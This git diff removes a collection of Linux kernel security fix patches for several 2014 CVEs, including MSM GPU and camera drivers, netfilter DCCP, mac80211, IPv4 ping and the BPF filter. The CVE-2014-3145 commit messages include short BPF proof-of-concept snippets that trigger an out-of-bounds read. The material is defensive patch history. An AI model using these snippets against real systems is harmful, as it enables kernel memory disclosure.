b/drivers/gpu/msm/adreno.h -@@ -805,6 +805,11 @@ static inline int adreno_add_read_cmds(struct kgsl_device *device, - *cmds++ = val; - *cmds++ = 0xFFFFFFFF; - *cmds++ = 0xFFFFFFFF; -+ -+ /* WAIT_REG_MEM turns back on protected mode - push it off */ -+ *cmds++ = cp_type3_packet(CP_SET_PROTECTED_MODE, 1); -+ *cmds++ = 0; -+ - cmds += __adreno_add_idle_indirect_cmds(cmds, nop_gpuaddr); - return cmds - start; - } -@@ -850,6 +855,11 @@ static inline int adreno_wait_reg_mem(unsigned int *cmds, unsigned int addr, - *cmds++ = val; /* ref val */ - *cmds++ = mask; - *cmds++ = interval; -+ -+ /* WAIT_REG_MEM turns back on 
protected mode - push it off */ -+ *cmds++ = cp_type3_packet(CP_SET_PROTECTED_MODE, 1); -+ *cmds++ = 0; -+ - return cmds - start; - } - /* -diff --git a/drivers/gpu/msm/adreno_a3xx.c b/drivers/gpu/msm/adreno_a3xx.c -index 70ba50e..873a5c9 100644 ---- a/drivers/gpu/msm/adreno_a3xx.c -+++ b/drivers/gpu/msm/adreno_a3xx.c -@@ -2038,6 +2038,7 @@ static void a3xx_protect_init(struct kgsl_device *device) - - /* CP registers */ - adreno_set_protected_registers(device, &index, 0x1C0, 5); -+ adreno_set_protected_registers(device, &index, 0x1EC, 1); - adreno_set_protected_registers(device, &index, 0x1F6, 1); - adreno_set_protected_registers(device, &index, 0x1F8, 2); - adreno_set_protected_registers(device, &index, 0x45E, 2); -diff --git a/drivers/gpu/msm/kgsl_iommu.c b/drivers/gpu/msm/kgsl_iommu.c -index dba23b0..68b3420 100644 ---- a/drivers/gpu/msm/kgsl_iommu.c -+++ b/drivers/gpu/msm/kgsl_iommu.c -@@ -1036,6 +1036,10 @@ static unsigned int kgsl_iommu_sync_lock(struct kgsl_mmu *mmu, - *cmds++ = 0x1; - *cmds++ = 0x1; - -+ /* WAIT_REG_MEM turns back on protected mode - push it off */ -+ *cmds++ = cp_type3_packet(CP_SET_PROTECTED_MODE, 1); -+ *cmds++ = 0; -+ - *cmds++ = cp_type3_packet(CP_MEM_WRITE, 2); - *cmds++ = lock_vars->turn; - *cmds++ = 0; -@@ -1050,11 +1054,19 @@ static unsigned int kgsl_iommu_sync_lock(struct kgsl_mmu *mmu, - *cmds++ = 0x1; - *cmds++ = 0x1; - -+ /* WAIT_REG_MEM turns back on protected mode - push it off */ -+ *cmds++ = cp_type3_packet(CP_SET_PROTECTED_MODE, 1); -+ *cmds++ = 0; -+ - *cmds++ = cp_type3_packet(CP_TEST_TWO_MEMS, 3); - *cmds++ = lock_vars->flag[PROC_APPS]; - *cmds++ = lock_vars->turn; - *cmds++ = 0; - -+ /* TEST_TWO_MEMS turns back on protected mode - push it off */ -+ *cmds++ = cp_type3_packet(CP_SET_PROTECTED_MODE, 1); -+ *cmds++ = 0; -+ - cmds += adreno_add_idle_cmds(adreno_dev, cmds); - - return cmds - start; -@@ -1092,6 +1104,10 @@ static unsigned int kgsl_iommu_sync_unlock(struct kgsl_mmu *mmu, - *cmds++ = 0x1; - *cmds++ = 0x1; - -+ 
/* WAIT_REG_MEM turns back on protected mode - push it off */ -+ *cmds++ = cp_type3_packet(CP_SET_PROTECTED_MODE, 1); -+ *cmds++ = 0; -+ - cmds += adreno_add_idle_cmds(adreno_dev, cmds); - - return cmds - start; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-0972/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2014-0972/ANY/0002.patch deleted file mode 100644 index 2e743900..00000000 --- a/Patches/Linux_CVEs/CVE-2014-0972/ANY/0002.patch +++ /dev/null @@ -1,31 +0,0 @@ -From d7d07936a166e7421a6308eec443b707a9678580 Mon Sep 17 00:00:00 2001 -From: Jordan Crouse -Date: Thu, 17 Apr 2014 10:05:21 -0600 -Subject: msm: kgsl: Mark the IOMMU setstate memory as read only - -Mark the IOMMU setstate memory as read only in the pagetable. - -Change-Id: Ic0dedbadb19e499c749cd744c3e89be3bcb4c2a2 -Signed-off-by: Jordan Crouse ---- - drivers/gpu/msm/kgsl_mmu.c | 4 ++++ - 1 file changed, 4 insertions(+) - -diff --git a/drivers/gpu/msm/kgsl_mmu.c b/drivers/gpu/msm/kgsl_mmu.c -index 95aac09..eb6d76f 100644 ---- a/drivers/gpu/msm/kgsl_mmu.c -+++ b/drivers/gpu/msm/kgsl_mmu.c -@@ -377,6 +377,10 @@ int kgsl_mmu_init(struct kgsl_device *device) - PAGE_SIZE); - if (status) - return status; -+ -+ /* Mark the setstate memory as read only */ -+ mmu->setstate_memory.flags |= KGSL_MEMFLAGS_GPUREADONLY; -+ - kgsl_sharedmem_set(device, &mmu->setstate_memory, 0, 0, - mmu->setstate_memory.size); - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-0975/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-0975/ANY/0001.patch deleted file mode 100644 index ef25a282..00000000 --- a/Patches/Linux_CVEs/CVE-2014-0975/ANY/0001.patch +++ /dev/null 
@@ -1,35 +0,0 @@
-From 832666bda9606623c3cff5b14873553f82ec1281 Mon Sep 17 00:00:00 2001
-From: Suman Mukherjee
-Date: Tue, 9 Dec 2014 13:25:36 +0530
-Subject: msm: camera: add check for csid_cid to prevent of overwrite memory
-
-add sanity check for csid cid to ensute that we never read or write
-outside csid_dev->mem buffer
-
-Change-Id: Ic8f0d689fa176720ae3a3316f2ad27556ae7bde5
-Signed-off-by: Suman Mukherjee
----
- drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c b/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c
-index 3596a12..53a5ed3 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c
-@@ -50,6 +50,13 @@ static int msm_csid_cid_lut(
- return -EINVAL;
- }
- for (i = 0; i < csid_lut_params->num_cid && i < 16; i++) {
-+ if (csid_lut_params->vc_cfg[i]->cid >=
-+ csid_lut_params->num_cid ||
-+ csid_lut_params->vc_cfg[i]->cid < 0) {
-+ pr_err("%s: cid outside range %d\n",
-+ __func__, csid_lut_params->vc_cfg[i]->cid);
-+ return -EINVAL;
-+ }
- CDBG("%s lut params num_cid = %d, cid = %d, dt = %x, df = %d\n",
- __func__,
- csid_lut_params->num_cid,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-0976/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-0976/ANY/0001.patch
deleted file mode 100644
index 9136c47e..00000000
--- a/Patches/Linux_CVEs/CVE-2014-0976/ANY/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From ee37138b8ceee6035c93756043eaac7eaa1c0948 Mon Sep 17 00:00:00 2001
-From: Suman Mukherjee
-Date: Wed, 17 Dec 2014 10:00:49 +0530
-Subject: msm: camera: ispif: Validate vfe_intf parameter
-
-Validate vfe_intf parameter to avoid invalid register access.
-
-Change-Id: Ie0b57071cc5fca1c48d3a5e2e7819f9af9ff544c
-Signed-off-by: Suman Mukherjee
----
- drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-index 8f99ff6..d044c1d 100755
---- a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-+++ b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-@@ -60,8 +60,8 @@ static void msm_ispif_io_dump_reg(struct ispif_device *ispif)
- static inline int msm_ispif_is_intf_valid(uint32_t csid_version,
- uint8_t intf_type)
- {
-- return (csid_version <= CSID_VERSION_V22 && intf_type != VFE0) ?
-- false : true;
-+ return ((csid_version <= CSID_VERSION_V22 && intf_type != VFE0) ||
-+ (intf_type >= VFE_MAX)) ? false : true;
- }
-
- static struct msm_cam_clk_info ispif_8626_reset_clk_info[] = {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-1739/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-1739/ANY/0001.patch
deleted file mode 100644
index 58b14f95..00000000
--- a/Patches/Linux_CVEs/CVE-2014-1739/ANY/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From e6a623460e5fc960ac3ee9f946d3106233fd28d8 Mon Sep 17 00:00:00 2001
-From: =?UTF-8?q?Salva=20Peir=C3=B3?=
-Date: Wed, 30 Apr 2014 19:48:02 +0200
-Subject: [media] media-device: fix infoleak in ioctl media_enum_entities()
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-This fixes CVE-2014-1739.
-
-Signed-off-by: Salva Peiró
-Acked-by: Laurent Pinchart
-Cc: stable@vger.kernel.org
-Signed-off-by: Mauro Carvalho Chehab
----
- drivers/media/media-device.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/drivers/media/media-device.c b/drivers/media/media-device.c
-index d5a7a13..703560f 100644
---- a/drivers/media/media-device.c
-+++ b/drivers/media/media-device.c
-@@ -93,6 +93,7 @@ static long media_device_enum_entities(struct media_device *mdev,
- struct media_entity *ent;
- struct media_entity_desc u_ent;
-
-+ memset(&u_ent, 0, sizeof(u_ent));
- if (copy_from_user(&u_ent.id, &uent->id, sizeof(u_ent.id)))
- return -EFAULT;
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-2523/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2014-2523/3.2/0001.patch
deleted file mode 100644
index 9e63ea71..00000000
--- a/Patches/Linux_CVEs/CVE-2014-2523/3.2/0001.patch
+++ /dev/null
@@ -1,64 +0,0 @@ -From 5b866eaa34e4ddc312c927030fde5f6a6184ddc5 Mon Sep 17 00:00:00 2001 -From: Daniel Borkmann -Date: Mon, 6 Jan 2014 00:57:54 +0100 -Subject: netfilter: nf_conntrack_dccp: fix skb_header_pointer API usages - -commit b22f5126a24b3b2f15448c3f2a254fc10cbc2b92 upstream. - -Some occurences in the netfilter tree use skb_header_pointer() in -the following way ... - - struct dccp_hdr _dh, *dh; - ... - skb_header_pointer(skb, dataoff, sizeof(_dh), &dh); - -... where dh itself is a pointer that is being passed as the copy -buffer. Instead, we need to use &_dh as the forth argument so that -we're copying the data into an actual buffer that sits on the stack. - -Currently, we probably could overwrite memory on the stack (e.g. -with a possibly mal-formed DCCP packet), but unintentionally, as -we only want the buffer to be placed into _dh variable. - -Fixes: 2bc780499aa3 ("[NETFILTER]: nf_conntrack: add DCCP protocol support") -Signed-off-by: Daniel Borkmann -Signed-off-by: Pablo Neira Ayuso -Signed-off-by: Ben Hutchings ---- - net/netfilter/nf_conntrack_proto_dccp.c | 6 +++--- - 1 file changed, 3 insertions(+), 3 deletions(-) - -diff --git a/net/netfilter/nf_conntrack_proto_dccp.c b/net/netfilter/nf_conntrack_proto_dccp.c -index 2e664a6..8aa94ee 100644 ---- a/net/netfilter/nf_conntrack_proto_dccp.c -+++ b/net/netfilter/nf_conntrack_proto_dccp.c -@@ -431,7 +431,7 @@ static bool dccp_new(struct nf_conn *ct, const struct sk_buff *skb, - const char *msg; - u_int8_t state; - -- dh = skb_header_pointer(skb, dataoff, sizeof(_dh), &dh); -+ dh = skb_header_pointer(skb, dataoff, sizeof(_dh), &_dh); - BUG_ON(dh == NULL); - - state = dccp_state_table[CT_DCCP_ROLE_CLIENT][dh->dccph_type][CT_DCCP_NONE]; -@@ -483,7 +483,7 @@ static int dccp_packet(struct nf_conn *ct, const struct sk_buff *skb, - u_int8_t type, old_state, new_state; - enum ct_dccp_roles role; - -- dh = skb_header_pointer(skb, dataoff, sizeof(_dh), &dh); -+ dh = skb_header_pointer(skb, dataoff, sizeof(_dh), 
&_dh); - BUG_ON(dh == NULL); - type = dh->dccph_type; - -@@ -575,7 +575,7 @@ static int dccp_error(struct net *net, struct nf_conn *tmpl, - unsigned int cscov; - const char *msg; - -- dh = skb_header_pointer(skb, dataoff, sizeof(_dh), &dh); -+ dh = skb_header_pointer(skb, dataoff, sizeof(_dh), &_dh); - if (dh == NULL) { - msg = "nf_ct_dccp: short packet "; - goto out_invalid; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-2523/^3.13/0002.patch b/Patches/Linux_CVEs/CVE-2014-2523/^3.13/0002.patch deleted file mode 100644 index f319b8d5..00000000 --- a/Patches/Linux_CVEs/CVE-2014-2523/^3.13/0002.patch +++ /dev/null 
@@ -1,59 +0,0 @@ -From b22f5126a24b3b2f15448c3f2a254fc10cbc2b92 Mon Sep 17 00:00:00 2001 -From: Daniel Borkmann -Date: Mon, 6 Jan 2014 00:57:54 +0100 -Subject: [PATCH] netfilter: nf_conntrack_dccp: fix skb_header_pointer API - usages - -Some occurences in the netfilter tree use skb_header_pointer() in -the following way ... - - struct dccp_hdr _dh, *dh; - ... - skb_header_pointer(skb, dataoff, sizeof(_dh), &dh); - -... where dh itself is a pointer that is being passed as the copy -buffer. Instead, we need to use &_dh as the forth argument so that -we're copying the data into an actual buffer that sits on the stack. - -Currently, we probably could overwrite memory on the stack (e.g. -with a possibly mal-formed DCCP packet), but unintentionally, as -we only want the buffer to be placed into _dh variable. - -Fixes: 2bc780499aa3 ("[NETFILTER]: nf_conntrack: add DCCP protocol support") -Signed-off-by: Daniel Borkmann -Signed-off-by: Pablo Neira Ayuso ---- - net/netfilter/nf_conntrack_proto_dccp.c | 6 +++--- - 1 file changed, 3 insertions(+), 3 deletions(-) - -diff --git a/net/netfilter/nf_conntrack_proto_dccp.c b/net/netfilter/nf_conntrack_proto_dccp.c -index 38412684a8824..cb372f96f10dc 100644 ---- a/net/netfilter/nf_conntrack_proto_dccp.c -+++ b/net/netfilter/nf_conntrack_proto_dccp.c -@@ -428,7 +428,7 @@ static bool dccp_new(struct nf_conn *ct, const struct sk_buff *skb, - const char *msg; - u_int8_t state; - -- dh = skb_header_pointer(skb, dataoff, sizeof(_dh), &dh); -+ dh = skb_header_pointer(skb, dataoff, sizeof(_dh), &_dh); - BUG_ON(dh == NULL); - - state = dccp_state_table[CT_DCCP_ROLE_CLIENT][dh->dccph_type][CT_DCCP_NONE]; -@@ -486,7 +486,7 @@ static int dccp_packet(struct nf_conn *ct, const struct sk_buff *skb, - u_int8_t type, old_state, new_state; - enum ct_dccp_roles role; - -- dh = skb_header_pointer(skb, dataoff, sizeof(_dh), &dh); -+ dh = skb_header_pointer(skb, dataoff, sizeof(_dh), &_dh); - BUG_ON(dh == NULL); - type = dh->dccph_type; - -@@ -577,7 
+577,7 @@ static int dccp_error(struct net *net, struct nf_conn *tmpl, - unsigned int cscov; - const char *msg; - -- dh = skb_header_pointer(skb, dataoff, sizeof(_dh), &dh); -+ dh = skb_header_pointer(skb, dataoff, sizeof(_dh), &_dh); - if (dh == NULL) { - msg = "nf_ct_dccp: short packet "; - goto out_invalid; diff --git a/Patches/Linux_CVEs/CVE-2014-2706/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-2706/ANY/0001.patch deleted file mode 100644 index 9ae44f32..00000000 --- a/Patches/Linux_CVEs/CVE-2014-2706/ANY/0001.patch +++ /dev/null 
@@ -1,160 +0,0 @@ -From 1d147bfa64293b2723c4fec50922168658e613ba Mon Sep 17 00:00:00 2001 -From: Emmanuel Grumbach -Date: Thu, 20 Feb 2014 09:22:11 +0200 -Subject: mac80211: fix AP powersave TX vs. wakeup race - -There is a race between the TX path and the STA wakeup: while -a station is sleeping, mac80211 buffers frames until it wakes -up, then the frames are transmitted. However, the RX and TX -path are concurrent, so the packet indicating wakeup can be -processed while a packet is being transmitted. - -This can lead to a situation where the buffered frames list -is emptied on the one side, while a frame is being added on -the other side, as the station is still seen as sleeping in -the TX path. - -As a result, the newly added frame will not be send anytime -soon. It might be sent much later (and out of order) when the -station goes to sleep and wakes up the next time. - -Additionally, it can lead to the crash below. - -Fix all this by synchronising both paths with a new lock. -Both path are not fastpath since they handle PS situations. - -In a later patch we'll remove the extra skb queue locks to -reduce locking overhead. 
- -BUG: unable to handle kernel -NULL pointer dereference at 000000b0 -IP: [] ieee80211_report_used_skb+0x11/0x3e0 [mac80211] -*pde = 00000000 -Oops: 0000 [#1] SMP DEBUG_PAGEALLOC -EIP: 0060:[] EFLAGS: 00210282 CPU: 1 -EIP is at ieee80211_report_used_skb+0x11/0x3e0 [mac80211] -EAX: e5900da0 EBX: 00000000 ECX: 00000001 EDX: 00000000 -ESI: e41d00c0 EDI: e5900da0 EBP: ebe458e4 ESP: ebe458b0 - DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 -CR0: 8005003b CR2: 000000b0 CR3: 25a78000 CR4: 000407d0 -DR0: 00000000 DR1: 00000000 DR2: 00000000 DR3: 00000000 -DR6: ffff0ff0 DR7: 00000400 -Process iperf (pid: 3934, ti=ebe44000 task=e757c0b0 task.ti=ebe44000) -iwlwifi 0000:02:00.0: I iwl_pcie_enqueue_hcmd Sending command LQ_CMD (#4e), seq: 0x0903, 92 bytes at 3[3]:9 -Stack: - e403b32c ebe458c4 00200002 00200286 e403b338 ebe458cc c10960bb e5900da0 - ff76a6ec ebe458d8 00000000 e41d00c0 e5900da0 ebe458f0 ff6f1b75 e403b210 - ebe4598c ff723dc1 00000000 ff76a6ec e597c978 e403b758 00000002 00000002 -Call Trace: - [] ieee80211_free_txskb+0x15/0x20 [mac80211] - [] invoke_tx_handlers+0x1661/0x1780 [mac80211] - [] ieee80211_tx+0x75/0x100 [mac80211] - [] ieee80211_xmit+0x8f/0xc0 [mac80211] - [] ieee80211_subif_start_xmit+0x4fe/0xe20 [mac80211] - [] dev_hard_start_xmit+0x450/0x950 - [] sch_direct_xmit+0xa9/0x250 - [] __qdisc_run+0x4b/0x150 - [] dev_queue_xmit+0x2c2/0xca0 - -Cc: stable@vger.kernel.org -Reported-by: Yaara Rozenblum -Signed-off-by: Emmanuel Grumbach -Reviewed-by: Stanislaw Gruszka -[reword commit log, use a separate lock] -Signed-off-by: Johannes Berg ---- - net/mac80211/sta_info.c | 4 ++++ - net/mac80211/sta_info.h | 7 +++---- - net/mac80211/tx.c | 15 +++++++++++++++ - 3 files changed, 22 insertions(+), 4 deletions(-) - -diff --git a/net/mac80211/sta_info.c b/net/mac80211/sta_info.c -index decd30c..62a5f08 100644 ---- a/net/mac80211/sta_info.c -+++ b/net/mac80211/sta_info.c -@@ -330,6 +330,7 @@ struct sta_info *sta_info_alloc(struct ieee80211_sub_if_data *sdata, - 
rcu_read_unlock(); - - spin_lock_init(&sta->lock); -+ spin_lock_init(&sta->ps_lock); - INIT_WORK(&sta->drv_unblock_wk, sta_unblock); - INIT_WORK(&sta->ampdu_mlme.work, ieee80211_ba_session_work); - mutex_init(&sta->ampdu_mlme.mtx); -@@ -1109,6 +1110,8 @@ void ieee80211_sta_ps_deliver_wakeup(struct sta_info *sta) - - skb_queue_head_init(&pending); - -+ /* sync with ieee80211_tx_h_unicast_ps_buf */ -+ spin_lock(&sta->ps_lock); - /* Send all buffered frames to the station */ - for (ac = 0; ac < IEEE80211_NUM_ACS; ac++) { - int count = skb_queue_len(&pending), tmp; -@@ -1128,6 +1131,7 @@ void ieee80211_sta_ps_deliver_wakeup(struct sta_info *sta) - } - - ieee80211_add_pending_skbs_fn(local, &pending, clear_sta_ps_flags, sta); -+ spin_unlock(&sta->ps_lock); - - /* This station just woke up and isn't aware of our SMPS state */ - if (!ieee80211_smps_is_restrictive(sta->known_smps_mode, -diff --git a/net/mac80211/sta_info.h b/net/mac80211/sta_info.h -index d77ff70..d3a6d82 100644 ---- a/net/mac80211/sta_info.h -+++ b/net/mac80211/sta_info.h -@@ -267,6 +267,7 @@ struct ieee80211_tx_latency_stat { - * @drv_unblock_wk: used for driver PS unblocking - * @listen_interval: listen interval of this station, when we're acting as AP - * @_flags: STA flags, see &enum ieee80211_sta_info_flags, do not use directly -+ * @ps_lock: used for powersave (when mac80211 is the AP) related locking - * @ps_tx_buf: buffers (per AC) of frames to transmit to this station - * when it leaves power saving state or polls - * @tx_filtered: buffers (per AC) of frames we already tried to -@@ -356,10 +357,8 @@ struct sta_info { - /* use the accessors defined below */ - unsigned long _flags; - -- /* -- * STA powersave frame queues, no more than the internal -- * locking required. 
-- */ -+ /* STA powersave lock and frame queues */ -+ spinlock_t ps_lock; - struct sk_buff_head ps_tx_buf[IEEE80211_NUM_ACS]; - struct sk_buff_head tx_filtered[IEEE80211_NUM_ACS]; - unsigned long driver_buffered_tids; -diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c -index 97a02d3..4080c61 100644 ---- a/net/mac80211/tx.c -+++ b/net/mac80211/tx.c -@@ -478,6 +478,20 @@ ieee80211_tx_h_unicast_ps_buf(struct ieee80211_tx_data *tx) - sta->sta.addr, sta->sta.aid, ac); - if (tx->local->total_ps_buffered >= TOTAL_MAX_TX_BUFFER) - purge_old_ps_buffers(tx->local); -+ -+ /* sync with ieee80211_sta_ps_deliver_wakeup */ -+ spin_lock(&sta->ps_lock); -+ /* -+ * STA woke up the meantime and all the frames on ps_tx_buf have -+ * been queued to pending queue. No reordering can happen, go -+ * ahead and Tx the packet. -+ */ -+ if (!test_sta_flag(sta, WLAN_STA_PS_STA) && -+ !test_sta_flag(sta, WLAN_STA_PS_DRIVER)) { -+ spin_unlock(&sta->ps_lock); -+ return TX_CONTINUE; -+ } -+ - if (skb_queue_len(&sta->ps_tx_buf[ac]) >= STA_MAX_TX_BUFFER) { - struct sk_buff *old = skb_dequeue(&sta->ps_tx_buf[ac]); - ps_dbg(tx->sdata, -@@ -492,6 +506,7 @@ ieee80211_tx_h_unicast_ps_buf(struct ieee80211_tx_data *tx) - info->flags |= IEEE80211_TX_INTFL_NEED_TXPROCESSING; - info->flags &= ~IEEE80211_TX_TEMPORARY_FLAGS; - skb_queue_tail(&sta->ps_tx_buf[ac], tx->skb); -+ spin_unlock(&sta->ps_lock); - - if (!timer_pending(&local->sta_cleanup)) - mod_timer(&local->sta_cleanup, --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-2851/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2014-2851/3.2/0001.patch deleted file mode 100644 index a954b65f..00000000 --- a/Patches/Linux_CVEs/CVE-2014-2851/3.2/0001.patch +++ /dev/null 
@@ -1,64 +0,0 @@ -From b04c46190219a4f845e46a459e3102137b7f6cac Mon Sep 17 00:00:00 2001 -From: "Wang, Xiaoming" -Date: Mon, 14 Apr 2014 12:30:45 -0400 -Subject: net: ipv4: current group_info should be put after using. - -Plug a group_info refcount leak in ping_init. -group_info is only needed during initialization and -the code failed to release the reference on exit. -While here move grabbing the reference to a place -where it is actually needed. - -Signed-off-by: Chuansheng Liu -Signed-off-by: Zhang Dongxing -Signed-off-by: xiaoming wang -Signed-off-by: David S. Miller ---- - net/ipv4/ping.c | 15 +++++++++++---- - 1 file changed, 11 insertions(+), 4 deletions(-) - -diff --git a/net/ipv4/ping.c b/net/ipv4/ping.c -index f4b19e5..8210964 100644 ---- a/net/ipv4/ping.c -+++ b/net/ipv4/ping.c -@@ -252,26 +252,33 @@ int ping_init_sock(struct sock *sk) - { - struct net *net = sock_net(sk); - kgid_t group = current_egid(); -- struct group_info *group_info = get_current_groups(); -- int i, j, count = group_info->ngroups; -+ struct group_info *group_info; -+ int i, j, count; - kgid_t low, high; -+ int ret = 0; - - inet_get_ping_group_range_net(net, &low, &high); - if (gid_lte(low, group) && gid_lte(group, high)) - return 0; - -+ group_info = get_current_groups(); -+ count = group_info->ngroups; - for (i = 0; i < group_info->nblocks; i++) { - int cp_count = min_t(int, NGROUPS_PER_BLOCK, count); - for (j = 0; j < cp_count; j++) { - kgid_t gid = group_info->blocks[i][j]; - if (gid_lte(low, gid) && gid_lte(gid, high)) -- return 0; -+ goto out_release_group; - } - - count -= cp_count; - } - -- return -EACCES; -+ ret = -EACCES; -+ -+out_release_group: -+ put_group_info(group_info); -+ return ret; - } - EXPORT_SYMBOL_GPL(ping_init_sock); - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-3145/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-3145/ANY/0001.patch deleted file mode 100644 index 789a053c..00000000 
--- a/Patches/Linux_CVEs/CVE-2014-3145/ANY/0001.patch
+++ /dev/null
@@ -1,91 +0,0 @@ -From 314760e66c35c8ffa51b4c4ca6948d207e783079 Mon Sep 17 00:00:00 2001 -From: Mathias Krause -Date: Sun, 13 Apr 2014 18:23:33 +0200 -Subject: filter: prevent nla extensions to peek beyond the end of the message - -[ Upstream commit 05ab8f2647e4221cbdb3856dd7d32bd5407316b3 ] - -The BPF_S_ANC_NLATTR and BPF_S_ANC_NLATTR_NEST extensions fail to check -for a minimal message length before testing the supplied offset to be -within the bounds of the message. This allows the subtraction of the nla -header to underflow and therefore -- as the data type is unsigned -- -allowing far to big offset and length values for the search of the -netlink attribute. - -The remainder calculation for the BPF_S_ANC_NLATTR_NEST extension is -also wrong. It has the minuend and subtrahend mixed up, therefore -calculates a huge length value, allowing to overrun the end of the -message while looking for the netlink attribute. - -The following three BPF snippets will trigger the bugs when attached to -a UNIX datagram socket and parsing a message with length 1, 2 or 3. - - ,-[ PoC for missing size check in BPF_S_ANC_NLATTR ]-- - | ld #0x87654321 - | ldx #42 - | ld #nla - | ret a - `--- - - ,-[ PoC for the same bug in BPF_S_ANC_NLATTR_NEST ]-- - | ld #0x87654321 - | ldx #42 - | ld #nlan - | ret a - `--- - - ,-[ PoC for wrong remainder calculation in BPF_S_ANC_NLATTR_NEST ]-- - | ; (needs a fake netlink header at offset 0) - | ld #0 - | ldx #42 - | ld #nlan - | ret a - `--- - -Fix the first issue by ensuring the message length fulfills the minimal -size constrains of a nla header. Fix the second bug by getting the math -for the remainder calculation right. - -Fixes: 4738c1db15 ("[SKFILTER]: Add SKF_ADF_NLATTR instruction") -Fixes: d214c7537b ("filter: add SKF_AD_NLATTR_NEST to look for nested..") -Cc: Patrick McHardy -Cc: Pablo Neira Ayuso -Signed-off-by: Mathias Krause -Acked-by: Daniel Borkmann -Signed-off-by: David S. 
Miller -Signed-off-by: Greg Kroah-Hartman ---- - net/core/filter.c | 6 +++++- - 1 file changed, 5 insertions(+), 1 deletion(-) - -diff --git a/net/core/filter.c b/net/core/filter.c -index 52f01229..c6c18d8 100644 ---- a/net/core/filter.c -+++ b/net/core/filter.c -@@ -355,6 +355,8 @@ load_b: - - if (skb_is_nonlinear(skb)) - return 0; -+ if (skb->len < sizeof(struct nlattr)) -+ return 0; - if (A > skb->len - sizeof(struct nlattr)) - return 0; - -@@ -371,11 +373,13 @@ load_b: - - if (skb_is_nonlinear(skb)) - return 0; -+ if (skb->len < sizeof(struct nlattr)) -+ return 0; - if (A > skb->len - sizeof(struct nlattr)) - return 0; - - nla = (struct nlattr *)&skb->data[A]; -- if (nla->nla_len > A - skb->len) -+ if (nla->nla_len > skb->len - A) - return 0; - - nla = nla_find_nested(nla, X); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2014-3145/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2014-3145/ANY/0002.patch deleted file mode 100644 index 3e4a0227..00000000 --- a/Patches/Linux_CVEs/CVE-2014-3145/ANY/0002.patch +++ /dev/null 
@@ -1,90 +0,0 @@ -From 05ab8f2647e4221cbdb3856dd7d32bd5407316b3 Mon Sep 17 00:00:00 2001 -From: Mathias Krause -Date: Sun, 13 Apr 2014 18:23:33 +0200 -Subject: filter: prevent nla extensions to peek beyond the end of the message - -The BPF_S_ANC_NLATTR and BPF_S_ANC_NLATTR_NEST extensions fail to check -for a minimal message length before testing the supplied offset to be -within the bounds of the message. This allows the subtraction of the nla -header to underflow and therefore -- as the data type is unsigned -- -allowing far to big offset and length values for the search of the -netlink attribute. - -The remainder calculation for the BPF_S_ANC_NLATTR_NEST extension is -also wrong. It has the minuend and subtrahend mixed up, therefore -calculates a huge length value, allowing to overrun the end of the -message while looking for the netlink attribute. - -The following three BPF snippets will trigger the bugs when attached to -a UNIX datagram socket and parsing a message with length 1, 2 or 3. - - ,-[ PoC for missing size check in BPF_S_ANC_NLATTR ]-- - | ld #0x87654321 - | ldx #42 - | ld #nla - | ret a - `--- - - ,-[ PoC for the same bug in BPF_S_ANC_NLATTR_NEST ]-- - | ld #0x87654321 - | ldx #42 - | ld #nlan - | ret a - `--- - - ,-[ PoC for wrong remainder calculation in BPF_S_ANC_NLATTR_NEST ]-- - | ; (needs a fake netlink header at offset 0) - | ld #0 - | ldx #42 - | ld #nlan - | ret a - `--- - -Fix the first issue by ensuring the message length fulfills the minimal -size constrains of a nla header. Fix the second bug by getting the math -for the remainder calculation right. - -Fixes: 4738c1db15 ("[SKFILTER]: Add SKF_ADF_NLATTR instruction") -Fixes: d214c7537b ("filter: add SKF_AD_NLATTR_NEST to look for nested..") -Cc: Patrick McHardy -Cc: Pablo Neira Ayuso -Signed-off-by: Mathias Krause -Acked-by: Daniel Borkmann -Signed-off-by: David S. 
